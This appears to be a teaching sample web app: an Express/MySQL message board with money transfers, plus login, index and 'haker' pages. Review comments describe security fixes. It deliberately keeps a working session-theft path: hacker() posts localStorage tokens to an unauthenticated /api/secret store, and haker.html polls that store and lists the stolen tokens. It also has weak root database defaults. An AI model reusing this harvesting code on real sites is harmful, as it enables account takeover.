// Server dependencies and Express application setup.
const httpManager = require('http');
const mysql = require('mysql');
// const urlManager = require('url');
const express = require('express');
const bodyParser = require('body-parser');

const app = express();
// Body parsing: JSON payloads and classic form-encoded POST data
// (the front-end pages in this sample post form-encoded data via jQuery).
app.use(bodyParser.json());
app.use(bodyParser.urlencoded({ extended: false }));
// CORS and default-header middleware, applied to every request.
// NOTE(review): Access-Control-Allow-Origin is the wildcard, so a page on any
// origin may call this API from a browser. Because the routes below accept the
// session token in the query string or body, a token copied out of the client's
// localStorage is usable from anywhere; pin the origin to the page that really
// serves the front end before deploying.
// NOTE(review): X-Powered-By is overwritten with the literal ' 3.2.1' (leading
// space included) — a fingerprint-obfuscation value, not a version.
// NOTE(review): Content-Type is forced to JSON for every response, including
// those that never send a body.
app.all('*', (req, res, next) => {
  // res.set is the same function as res.header in Express.
  res.set({
    'Access-Control-Allow-Origin': '*',
    'Access-Control-Allow-Headers': 'X-Requested-With',
    'Access-Control-Allow-Methods': 'PUT,POST,GET,DELETE,OPTIONS',
    'X-Powered-By': ' 3.2.1',
    'Content-Type': 'application/json;charset=utf-8',
  });
  next();
});
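// Database connection.
// Credentials are read from the environment, falling back to the values that
// were previously hard-coded so an existing local setup keeps working.
// NOTE(review): the fallback is the MySQL root account with a trivial password.
// A deployment must set DB_USER / DB_PASSWORD to a dedicated, least-privilege
// account and must not rely on the defaults; the credentials also no longer
// need to live in source control.

// Read one environment variable; an explicitly empty value is kept, only an
// unset variable falls back.
function envOr(name, fallback) {
  const value = process.env[name];
  return value === undefined ? fallback : value;
}

const connection = mysql.createConnection({
  host: envOr('DB_HOST', '127.0.0.1'),
  user: envOr('DB_USER', 'root'),
  password: envOr('DB_PASSWORD', '123456'),
  database: envOr('DB_NAME', 'hight'),
});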
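// Copy a user row without the columns a client must never receive.
// The user table holds the plain password (compared in /api/login) and the
// session token; SELECT * would otherwise ship both to the browser.
function stripCredentialColumns(row) {
  const safe = Object.assign({}, row);
  delete safe.password;
  delete safe.session;
  return safe;
}

// GET /api/getUserInfo?session=<token>
// Resolves the session token to its user row.
// Response: { success: true, results: [row] } when a row matches,
//           { success: false, results: [] } when none does (the client treats
//           this as "not logged in" and redirects),
//           HTTP 500 { success: false, results: [] } on a database error.
// NOTE(review): the token travels in the query string, so it lands in access
// logs and browser history; a header or cookie would be the safer transport.
app.get('/api/getUserInfo', function(req, res) {
  res.status(200);
  var session = req.query.session || -1;
  connection.query('SELECT * FROM user where session= ?', session, function (error, results, fields) {
    if (error) {
      // `results` is undefined on error; the old code only logged and then
      // threw on results.length inside the driver callback, crashing the process.
      console.log("查询出错!");
      res.status(500).json({success: false, 'results': []});
      return;
    }
    if (results.length !== 0) {
      // The front end reads only name and money from the row.
      res.json({success: true, 'results': results.map(stripCredentialColumns)});
    } else {
      res.json({success: false, 'results': []});
    }
  });
});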
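// GET /api/getAllMsg?session=<token>
// Returns every row of all_msg to a caller holding a valid session.
// Response: { success: true, results: [...] } (possibly empty) for a known
//           session, { success: false, results: [] } for an unknown one,
//           HTTP 500 { success: false, results: [] } on a database error.
app.get('/api/getAllMsg', function(req, res) {
  res.status(200);
  var session = req.query.session || -1;
  // The old handler read `session` and never checked it, so the whole message
  // table was readable without logging in. Every other data route in this file
  // gates on the session lookup; do the same here.
  connection.query('SELECT id FROM user where session= ?', session, function (error, users) {
    if (error) {
      console.log("查询出错!");
      res.status(500).json({success: false, 'results': []});
      return;
    }
    if (users.length === 0) {
      res.json({success: false, 'results': []});
      return;
    }
    connection.query('SELECT * FROM all_msg', function (msgError, results) {
      if (msgError) {
        // `results` is undefined on error; answering here avoids the TypeError
        // the old code hit on results.length.
        console.log("查询出错!");
        res.status(500).json({success: false, 'results': []});
        return;
      }
      // An empty board is not an auth failure: returning success:false for an
      // empty table made the client bounce to the login page whenever no
      // message existed yet.
      res.json({success: true, 'results': results});
    });
  });
});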
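// POST /api/trans  body: { session, desId, money }
// Moves `money` from the caller's account (the one `session` resolves to) to
// the account `desId`.
// Response: { success: true, results: [] } once the transfer is committed,
//           { success: false, results: [] } for an unknown session,
//           HTTP 400 { success: false, results: [] } for a non-positive or
//           non-numeric amount, an unknown destination, or insufficient funds,
//           HTTP 500 { success: false, results: [] } on a database error.
// The body's `id` field is no longer used: the old handler debited whatever
// id the client named rather than the account the session belongs to.
app.post('/api/trans', function(req, res) {
  res.status(200);
  var session = req.body.session || -1;
  var desId = req.body.desId;
  var money = Number(req.body.money);
  // The old console.log(req.body) wrote the session token to stdout; log the
  // transfer fields without the credential.
  console.log({ desId: desId, money: money });
  if (!Number.isFinite(money) || money <= 0) {
    // Without this check a negative or NaN amount was applied by the arithmetic
    // below, e.g. a negative "transfer" pulling funds from the destination.
    res.status(400).json({success: false, 'results': []});
    return;
  }
  connection.query('SELECT * FROM user where session= ?', session, function (error, results, fields) {
    if (error) {
      // `results` is undefined on error; the old code went on to read
      // results.length and crashed the process.
      console.log("查询出错!");
      res.status(500).json({success: false, 'results': []});
      return;
    }
    if (results.length === 0) {
      res.json({success: false, 'results': []});
      return;
    }
    transferMoney(results[0].id, desId, money, function (transferError, committed) {
      if (transferError) {
        console.log("查询出错!");
        res.status(500).json({success: false, 'results': []});
        return;
      }
      if (!committed) {
        res.status(400).json({success: false, 'results': []});
        return;
      }
      // The old handler never answered on the success path, so the client's
      // request hung until its timeout fired.
      res.json({success: true, 'results': []});
    });
  });
});

// Atomically move `amount` from account `fromId` to account `toId`.
// Calls back with (error) on a database failure, (null, false) when the source
// lacks funds or either account does not exist, and (null, true) on commit.
// The old code did two read-then-write pairs outside a transaction, so
// concurrent requests could lose updates and the balance check was absent.
// NOTE(review): assumes user.money is a numeric column (the old handler did
// arithmetic on it as well) — confirm against the schema.
function transferMoney(fromId, toId, amount, callback) {
  connection.beginTransaction(function (beginError) {
    if (beginError) {
      callback(beginError);
      return;
    }
    // Debit conditionally in SQL so the balance check and the update are one
    // statement.
    connection.query(
      'UPDATE user SET money = money - ? WHERE id = ? AND money >= ?',
      [amount, fromId, amount],
      function (debitError, debit) {
        if (debitError) {
          connection.rollback(function () { callback(debitError); });
          return;
        }
        if (debit.affectedRows !== 1) {
          connection.rollback(function () { callback(null, false); });
          return;
        }
        connection.query(
          'UPDATE user SET money = money + ? WHERE id = ?',
          [amount, toId],
          function (creditError, credit) {
            if (creditError) {
              connection.rollback(function () { callback(creditError); });
              return;
            }
            if (credit.affectedRows !== 1) {
              // Unknown destination: undo the debit rather than losing the money.
              connection.rollback(function () { callback(null, false); });
              return;
            }
            connection.commit(function (commitError) {
              if (commitError) {
                connection.rollback(function () { callback(commitError); });
                return;
              }
              callback(null, true);
            });
          }
        );
      }
    );
  });
}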
// POST /api/secret  body: { session, id }
// Records the submitted (id, session) pair in table hk. No response is ever
// written, so the caller's request hangs until it times out.
// NOTE(review): this route, its GET twin below and hacker() in index.html form
// the demo's session-harvesting path: a logged-in user's token is read from
// localStorage, posted here, and is then readable by anyone through
// GET /api/secret. For a defender the signals are an unauthenticated INSERT of
// a credential-bearing pair and an unauthenticated read of a table of live
// session tokens; neither belongs in a production build.
app.post('/api/secret', function(req, res) {
  res.status(200);
  const session = req.body.session || -1;
  const userId = req.body.id;
  console.log(session);
  const params = [userId, session];
  connection.query('insert into hk(userId, session) VALUES(?, ?)', params, function (error) {
    if (error) {
      console.log("查询出错!11");
    }
  });
});
// GET /api/secret
// Dumps every row of hk (userId/session pairs) to any caller; there is no
// session check. On a database error it logs and still passes the undefined
// result to res.json, exactly as before.
app.get('/api/secret', function(req, res) {
  res.status(200);
  connection.query('select * from hk', function (error, rows) {
    if (error) {
      console.log("查询出错!12");
    }
    res.json(rows);
  });
});
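// POST /api/addMsg  body: { session, content }
// Stores a new message for the user that owns `session`.
// Response: { success: true, results: <driver insert result> } on success,
//           { success: false, results: [] } for an unknown session,
//           HTTP 400 { success: false, results: [] } for missing/blank content,
//           HTTP 500 { success: false, results: [] } on a database error.
// The body's `id` and `name` fields are no longer used: the old handler stored
// whatever identity the client supplied, so one user could post as another.
app.post('/api/addMsg', function(req, res) {
  res.status(200);
  var session = req.body.session || -1;
  var content = req.body.content;
  // The old console.log(req.body) wrote the session token to stdout.
  console.log({ content: content });
  if (typeof content !== 'string' || content.trim() === '') {
    res.status(400).json({success: false, 'results': []});
    return;
  }
  connection.query('SELECT * FROM user where session= ?', session, function (error, users) {
    if (error) {
      // `users` is undefined on error; the old code read results.length next
      // and crashed the process.
      console.log("查询出错!");
      res.status(500).json({success: false, 'results': []});
      return;
    }
    if (users.length === 0) {
      res.json({success: false, 'results': []});
      return;
    }
    // Author id and display name come from the authenticated row.
    const author = users[0];
    // NOTE(review): content is stored verbatim; index.html currently inserts it
    // into the DOM as HTML, so the renderer must treat it as text.
    connection.query(
      'insert into all_msg(create_id, content, create_time, name) VALUES(?, ?, ?, ?)',
      [author.id, content, new Date(), author.name],
      function (insertError, results) {
        if (insertError) {
          console.log("查询出错!");
          res.status(500).json({success: false, 'results': []});
          return;
        }
        res.json({success: true, 'results': results});
      }
    );
  });
});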
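// POST /api/login  body: { username, password }
// Checks the credentials, issues a fresh session token, stores it on the user
// row and only then returns it with the user's id, name and balance.
// Response: { session, success: true, money, id, name } on success,
//           { session: null, success: false } for bad credentials,
//           HTTP 500 { session: null, success: false } on a database error.
app.post('/api/login', function(req, res) {
  // Function-scope require keeps this change self-contained (CommonJS file).
  const crypto = require('crypto');
  res.status(200);
  // The old console.log(req.body) also printed the password.
  console.log({ username: req.body.username });
  var name = req.body.username || "ALL";
  connection.query('select * from user where name= ?', name, function(error, results, fields) {
    if (error) {
      // `throw` inside a driver callback took the whole process down.
      console.log(error.message);
      res.status(500).json({'session': null, 'success': false});
      return;
    }
    // NOTE(review): the stored password is compared as plain text, i.e. the
    // user table holds credentials in the clear. Hashing (bcrypt/scrypt) needs
    // a schema change and is out of scope for this handler.
    const user = results[0];
    const supplied = req.body.password;
    if (!user || typeof supplied !== 'string' || user.password !== supplied) {
      res.json({'session': null, 'success': false});
      return;
    }
    // The old token was parseInt(Math.random() * 100000): at most 100000
    // values from a non-cryptographic generator, cheap to enumerate by anyone
    // who can call the API. Use a CSPRNG, staying inside a signed 32-bit range.
    // NOTE(review): assumes user.session is at least a 32-bit INT column —
    // confirm against the schema.
    const session = crypto.randomInt(0, 2147483647);
    connection.query('update user SET session=? where id= ?', [session, user.id], function(updateError) {
      if (updateError) {
        console.log(updateError.message);
        res.status(500).json({'session': null, 'success': false});
        return;
      }
      // Do not write the token itself to the log.
      console.log("update session success");
      // Reply only after the token is persisted; the old handler answered
      // first, so an immediate follow-up request could race the UPDATE.
      res.json({
        'session': session,
        'success': true,
        'money': user.money,
        'id': user.id,
        'name': user.name
      });
    });
  });
});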
// Start the HTTP listener, bound to the loopback interface only.
const server = app.listen(8080, '127.0.0.1', () => {
  const bound = server.address();
  console.log('Example app listening at http://%s:%s', bound.address, bound.port);
});
login.html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<script src="../js/jquery.js"></script>
<title>高大上的登录页面</title>
</head>
<body>
<div class="main_container">
<div class="login_box">
<h1 class="login_title">高大上的登录框</h1>
<input id="username" class="common_input" placeholder="用户名" />
<br>
<input id="password" class="common_input" type="password" placeholder="密码" />
<br>
<button class="common_input" id="loginBtn">登录</button>
</div>
</div>
</body>
<script type="text/javascript">
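// Write cookie `c_name`=`value`, scoped to path "/", valid for `expiredays`
// days when that argument is a finite number (otherwise a session cookie).
// `value` is escape()-encoded to round-trip through getCookie's unescape().
// Not called elsewhere in this script.
function setCookie(c_name, value, expiredays) {
  var cookie = c_name + "=" + escape(value);
  // The old code computed the expiry date and then never used it, so the
  // cookie was always a session cookie regardless of `expiredays`.
  if (typeof expiredays === "number" && isFinite(expiredays)) {
    var exdate = new Date();
    exdate.setDate(exdate.getDate() + expiredays);
    cookie += ";expires=" + exdate.toUTCString();
  }
  document.cookie = cookie + ";path=/";
}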
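// Read cookie `name` from document.cookie.
// Returns the unescape()-decoded value, or null when the cookie is absent.
function getCookie(name) {
  // `name` used to be spliced into the RegExp source unescaped, so a name
  // containing regex metacharacters matched the wrong cookie or threw.
  var escapedName = String(name).replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
  var reg = new RegExp("(^| )" + escapedName + "=([^;]*)(;|$)");
  var arr = document.cookie.match(reg);
  return arr ? unescape(arr[2]) : null;
}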
// Login button: POST the form to /api/login and, on success, cache the returned
// identity and session token in localStorage before moving to index.html.
// NOTE(review): the session token lives in localStorage, which any script on
// the page can read (the demo's hacker() in index.html relies on exactly that);
// an HttpOnly cookie would keep it out of script reach.
$("#loginBtn").on("click", () => {
  const credentials = {
    username: $("#username").val(),
    password: $("#password").val()
  };
  const onSuccess = (data) => {
    console.log("请求成功!");
    console.log(data);
    if (!data.success) {
      alert("用户名或密码错误!");
      return;
    }
    const cached = { id: data.id, name: data.name, money: data.money, session: data.session };
    for (const key of Object.keys(cached)) {
      window.localStorage.setItem(key, cached[key]);
    }
    window.location.href = './index.html';
  };
  $.ajax({
    method: "post",
    url: "http://127.0.0.1:8080/api/login",
    data: credentials,
    dataType: "json",
    success: onSuccess,
    // Any transport or parse error is reported to the user as a timeout.
    error: () => {
      alert("请求超时!");
    }
  });
});
</script>
<style>
html, body {
width: 100%;
height: 100%;
}
.login_box {
position: relative;
width: 100%;
text-align: center;
}
.common_input{
width: 20rem;
font-size: 2rem;
margin-top: 1.5rem;
padding: 0.5rem;
}
#loginBtn {
background-color: aquamarine;
font-size: 2rem;
cursor: pointer;
}
</style>
</html>
index.html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<script src="../js/jquery.js"></script>
<title>一个高大上的网站</title>
</head>
<style>
*{
box-sizing: border-box;
}
html,body{
width: 100%;
height: 100%;
}
.main_layout{
position: relative;
width: 100%;
padding: 1rem;
}
.header{
width: 100%;
height: auto;
padding: 1rem 0 ;
background-color: aquamarine;
}
</style>
<body>
<div class="main_layout">
<div class="header">
用户名: <span id="username"></span>
我的余额:<span id ="money"></span>
</div>
<div class="page_container">
<div id="all_msg">
</div>
<div class="">
<textarea id="my_edit_box" rows="12" style="width:100%">
</textarea>
<button id="liuyan">留言</button>
</div>
</div>
</div>
</body>
<script type="text/javascript">
// Write cookie `name`=`value`, expiring 30 days from now. The value is
// escape()-encoded to pair with getCookie's unescape(). Not called elsewhere
// in this script.
function setCookie(name, value) {
  const ttlMs = 30 * 24 * 60 * 60 * 1000;
  const expiry = new Date(Date.now() + ttlMs);
  // toUTCString produces the same text as the legacy toGMTString alias.
  document.cookie = name + "=" + escape(value) + ";expires=" + expiry.toUTCString();
}
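// Read cookie `name` from document.cookie.
// Returns the unescape()-decoded value, or null when the cookie is absent.
function getCookie(name) {
  // `name` used to be spliced into the RegExp source unescaped, so a name
  // containing regex metacharacters matched the wrong cookie or threw.
  var escapedName = String(name).replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
  var reg = new RegExp("(^| )" + escapedName + "=([^;]*)(;|$)");
  var arr = document.cookie.match(reg);
  return arr ? unescape(arr[2]) : null;
}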
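// Fetch every message for the cached session and render the list into #all_msg.
// Redirects to login.html when the server answers success:false.
function getAllMsg() {
  $.ajax({
    method: "get",
    url: "http://127.0.0.1:8080/api/getAllMsg",
    data: {
      session : window.localStorage.getItem("session")
    },
    dataType: "json",
    success: function(data){
      console.log(data);
      if(data.success){
        $("#all_msg").html("");
        (data.results || []).forEach(element => {
          // name and content are user-supplied (addMsg stores the body as
          // sent). The old code concatenated them into an HTML string, so a
          // message containing markup was parsed as HTML in every viewer's
          // browser (stored XSS); build the node and set its text instead.
          $("#all_msg").append($("<div>").text(element.name + ": " + element.content));
        });
      }else {
        window.location.href = './login.html'
      }
    },
    error : function(err) {
      alert("请求超时!");
    }
  });
}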
// Post the textarea contents as a new message under the cached identity.
// `id` and `name` are whatever localStorage holds, i.e. client-chosen; the
// server must not trust them.
function commitMsg() {
  const payload = {
    session : window.localStorage.getItem("session"),
    id : window.localStorage.getItem("id"),
    name: window.localStorage.getItem("name"),
    content: $("#my_edit_box").val()
  };
  const handleReply = (data) => {
    console.log(data);
    // Nothing happens on success; the 5-second getAllMsg poll shows the new
    // message.
    if (!data.success) {
      alert("无效的用户");
    }
  };
  $.ajax({
    method: "post",
    url: "http://127.0.0.1:8080/api/addMsg",
    data: payload,
    dataType: "json",
    success: handleReply,
    error : () => {
      alert("请求超时!");
    }
  });
}
// Ask the server to move `money` from the cached user to account `dId`.
// Amount and destination are sent as given; validation belongs server-side.
// Not invoked from this page's own code.
function trans(money, dId) {
  const payload = {
    session : window.localStorage.getItem("session"),
    id : window.localStorage.getItem("id"),
    desId: dId,
    'money': money
  };
  const handleReply = (data) => {
    console.log(data);
    if (!data.success) {
      alert("无效的用户");
    }
  };
  $.ajax({
    method: "post",
    url: "http://127.0.0.1:8080/api/trans",
    data: payload,
    dataType: "json",
    success: handleReply,
    error : () => {
      alert("请求超时!");
    }
  });
}
// Demonstration of the token theft this sample exists to illustrate: reads the
// cached session and user id out of localStorage and posts them to
// /api/secret, where the server stores them for haker.html to poll. Not
// invoked anywhere in this page; it stands in for any script that gets to run
// here, which is why a session token must not sit in script-readable storage.
function hacker() {
  const cached = {
    session : window.localStorage.getItem("session"),
    id : window.localStorage.getItem("id"),
  };
  $.ajax({
    method: "post",
    url: "http://127.0.0.1:8080/api/secret",
    data: cached,
    dataType: "json",
    success: () => {},
    error : () => {
      alert("请求超时!");
    }
  });
}
// Wire the message button to commitMsg.
$("#liuyan").on('click', () => {
  commitMsg();
});
// Poll the message list every 5 seconds.
setInterval(getAllMsg, 5000);
// On load: resolve the cached session to a user and show name and balance;
// go to login.html when the server does not recognise the session.
(() => {
  const showUser = (data) => {
    console.log(data);
    if (!data.success) {
      window.location.href = './login.html';
      return;
    }
    // .text() renders the values as text, so a name containing markup is
    // displayed rather than interpreted.
    const me = data.results[0];
    $("#username").text(me.name);
    $("#money").text(me.money);
  };
  $.ajax({
    method: "get",
    url: "http://127.0.0.1:8080/api/getUserInfo",
    data: {
      session : window.localStorage.getItem("session")
    },
    dataType: "json",
    success: showUser,
    error : () => {
      alert("请求超时!");
    }
  });
})();
</script>
</html>
haker.html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<script src="../js/jquery.js"></script>
<title>Document</title>
</head>
<body>
<div id="hk"></div>
</body>
<script type="text/javascript">
// Write cookie `name`=`value`, expiring 30 days from now. The value is
// escape()-encoded to pair with getCookie's unescape(). Not called elsewhere
// in this script.
function setCookie(name, value) {
  const ttlMs = 30 * 24 * 60 * 60 * 1000;
  const expiry = new Date(Date.now() + ttlMs);
  // toUTCString produces the same text as the legacy toGMTString alias.
  document.cookie = name + "=" + escape(value) + ";expires=" + expiry.toUTCString();
}
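// Read cookie `name` from document.cookie.
// Returns the unescape()-decoded value, or null when the cookie is absent.
function getCookie(name) {
  // `name` used to be spliced into the RegExp source unescaped, so a name
  // containing regex metacharacters matched the wrong cookie or threw.
  var escapedName = String(name).replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
  var reg = new RegExp("(^| )" + escapedName + "=([^;]*)(;|$)");
  var arr = document.cookie.match(reg);
  return arr ? unescape(arr[2]) : null;
}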
// Collection view for the demo: every 3 seconds pull the harvested
// (userId, session) pairs from the unauthenticated GET /api/secret and list
// them in #hk. For a defender this is the tell — a page with no login of its
// own polling an endpoint that returns live session tokens.
function c() {
  const render = (data) => {
    console.log(data);
    $("#hk").html("");
    (data || []).forEach(element => {
      // Values are concatenated straight into HTML, as in the original.
      $("#hk").append(
        "<div>userId: " + element.userId + " session: " + element.session + "</div>"
      );
    });
  };
  $.ajax({
    method: "get",
    url: "http://127.0.0.1:8080/api/secret",
    dataType: "json",
    success: render,
    error : () => {
      alert("请求超时!");
    }
  });
}
setInterval(c, 3000);
</script>
</html>
jquery.js
/*! jQuery v3.4.1 | (c) JS Foundation and other contributors | jquery.org/license */
!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],E=C.document,r=Object.getPrototypeOf,s=t.slice,g=t.concat,u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?n[o.call(e)]||"object":typeof e}var f="3.4.1",k=function(e,t){return new k.fn.init(e,t)},p=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g;function d(e){var t=!!e&&"length"in e&&e.length,n=w(e);return!m(e)&&!x(e)&&("array"===n||0===t||"number"==typeof t&&0<t&&t-1 in e)}k.fn=k.prototype={jquery:f,constructor:k,length:0,toArray:function(){return s.call(this)},get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=k.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return k.each(this,e)},map:function(n){return this.pushStack(k.map(this,function(e,t){return n.call(e,t,e)}))},slice:function(){return this.pushStack(s.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(0<=n&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:u,sort:t.sort,splice:t.splice},k.extend=k.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for("boolean"==typeof 
a&&(l=a,a=arguments[s]||{},s++),"object"==typeof a||m(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)r=e[t],"__proto__"!==t&&a!==r&&(l&&r&&(k.isPlainObject(r)||(i=Array.isArray(r)))?(n=a[t],o=i&&!Array.isArray(n)?[]:i||k.isPlainObject(n)?n:{},i=!1,a[t]=k.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},k.extend({expando:"jQuery"+(f+Math.random()).replace(/\D/g,""),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t){b(e,{nonce:t&&t.nonce})},each:function(e,t){var n,r=0;if(d(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},trim:function(e){return null==e?"":(e+"").replace(p,"")},makeArray:function(e,t){var n=t||[];return null!=e&&(d(Object(e))?k.merge(n,"string"==typeof e?[e]:e):u.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:i.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r=[],i=0,o=e.length,a=!n;i<o;i++)!t(e[i],i)!==a&&r.push(e[i]);return r},map:function(e,t,n){var r,i,o=0,a=[];if(d(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&a.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&a.push(i);return g.apply([],a)},guid:1,support:y}),"function"==typeof Symbol&&(k.fn[Symbol.iterator]=t[Symbol.iterator]),k.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(e,t){n["[object "+t+"]"]=t.toLowerCase()});var h=function(n){var e,d,b,o,i,h,f,g,w,u,l,T,C,a,E,v,s,c,y,k="sizzle"+1*new Date,m=n.document,S=0,r=0,p=ue(),x=ue(),N=ue(),A=ue(),D=function(e,t){return e===t&&(l=!0),0},j={}.hasOwnProperty,t=[],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var 
n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t\\r\\n\\f]",I="(?:\\\\.|[\\w-]|[^\0-\\xa0])+",W="\\["+M+"*("+I+")(?:"+M+"*([*^$|!~]?=)"+M+"*(?:'((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\"|("+I+"))|)"+M+"*\\]",$=":("+I+")(?:\\((('((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\")|((?:\\\\.|[^\\\\()[\\]]|"+W+")*)|.*)\\)|)",F=new RegExp(M+"+","g"),B=new RegExp("^"+M+"+|((?:^|[^\\\\])(?:\\\\.)*)"+M+"+$","g"),_=new RegExp("^"+M+"*,"+M+"*"),z=new RegExp("^"+M+"*([>+~]|"+M+")"+M+"*"),U=new RegExp(M+"|>"),X=new RegExp($),V=new RegExp("^"+I+"$"),G={ID:new RegExp("^#("+I+")"),CLASS:new RegExp("^\\.("+I+")"),TAG:new RegExp("^("+I+"|[*])"),ATTR:new RegExp("^"+W),PSEUDO:new RegExp("^"+$),CHILD:new RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\("+M+"*(even|odd|(([+-]|)(\\d*)n|)"+M+"*(?:([+-]|)"+M+"*(\\d+)|))"+M+"*\\)|)","i"),bool:new RegExp("^(?:"+R+")$","i"),needsContext:new RegExp("^"+M+"*[>+~]|:(even|odd|eq|gt|lt|nth|first|last)(?:\\("+M+"*((?:-\\d)?\\d*)"+M+"*\\)|)(?=[^-]|$)","i")},Y=/HTML$/i,Q=/^(?:input|select|textarea|button)$/i,J=/^h\d$/i,K=/^[^{]+\{\s*\[native \w/,Z=/^(?:#([\w-]+)|(\w+)|\.([\w-]+))$/,ee=/[+~]/,te=new RegExp("\\\\([\\da-f]{1,6}"+M+"?|("+M+")|.)","ig"),ne=function(e,t,n){var r="0x"+t-65536;return r!=r||n?t:r<0?String.fromCharCode(r+65536):String.fromCharCode(r>>10|55296,1023&r|56320)},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\x7f-\uFFFF\w-]/g,ie=function(e,t){return t?"\0"===e?"\ufffd":e.slice(0,-1)+"\\"+e.charCodeAt(e.length-1).toString(16)+" ":"\\"+e},oe=function(){T()},ae=be(function(e){return!0===e.disabled&&"fieldset"===e.nodeName.toLowerCase()},{dir:"parentNode",next:"legend"});try{H.apply(t=O.call(m.childNodes),m.childNodes),t[m.childNodes.length].nodeType}catch(e){H={apply:t.length?function(e,t){L.apply(e,O.call(t))}:function(e,t){var 
n=e.length,r=0;while(e[n++]=t[r++]);e.length=n-1}}}function se(t,e,n,r){var i,o,a,s,u,l,c,f=e&&e.ownerDocument,p=e?e.nodeType:9;if(n=n||[],"string"!=typeof t||!t||1!==p&&9!==p&&11!==p)return n;if(!r&&((e?e.ownerDocument||e:m)!==C&&T(e),e=e||C,E)){if(11!==p&&(u=Z.exec(t)))if(i=u[1]){if(9===p){if(!(a=e.getElementById(i)))return n;if(a.id===i)return n.push(a),n}else if(f&&(a=f.getElementById(i))&&y(e,a)&&a.id===i)return n.push(a),n}else{if(u[2])return H.apply(n,e.getElementsByTagName(t)),n;if((i=u[3])&